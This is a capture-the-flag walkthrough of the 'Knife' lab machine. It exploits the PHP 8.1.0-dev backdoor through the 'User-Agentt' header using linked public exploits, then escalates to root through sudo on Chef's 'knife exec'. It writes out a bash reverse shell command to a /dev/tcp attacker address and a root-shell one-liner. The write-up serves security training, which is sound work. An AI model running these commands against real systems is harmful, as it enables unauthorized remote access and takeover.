Knife is a easy machine with some new stuff to learn and exploit. let's start the machine with initial
scan.
Initial nmap scan shows that port 22(SSH) and 80(HTTP) is opened, i just went to explore the application which
is in port 80. as you can see below, there is a website related to the health care.
Exploring the application does not given any further hints or leads. not able to find any links or active functionalities such as account login. to move further i just checked the frameworks and technologies which has been used in the application. during the analysis i found the application is using PHP 8.1.0-dev.
A simple exploit search revealed that mentioned PHP version is vulnerable to remote code execution due to a backdoor which is planted in that release. an attacker can execute arbitrary code by sending the User-Agentt header. this is very interesting, you can find the story of this vulnerability in this site:
https://flast101.github.io/php-8.1.0-dev-backdoor-rce
By running the exploit https://www.exploit-db.com/exploits/49933
I'm able to get the shell of the machine after i got the user.txt
Privilege Escalation
As you can see below image that 'knife' can be run as sudo.Knife is a command-line tool that provides an interface between a local chef-repo and the Chef Infra Server. This is a very good documentation regarding knife : https://docs.chef.io/workstation/knife
To do privilege escalation, i would like to have a stable interactive shell therefore i just used this exploit to get reverse shell to my machine:
https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html
python3 exploit.py -u http://10.10.10.242/ -c "/bin/bash -c ' bash -i >& /dev/tcp/10.10.14.129/1234 0>&1'"
Based on the knife documentation https://docs.chef.io/workstation/knife_exec it is possible to run code via --exec sub command. by running the code i can get that root user and root.txt.
sudo knife exec --exec "exec '/bin/sh -i'"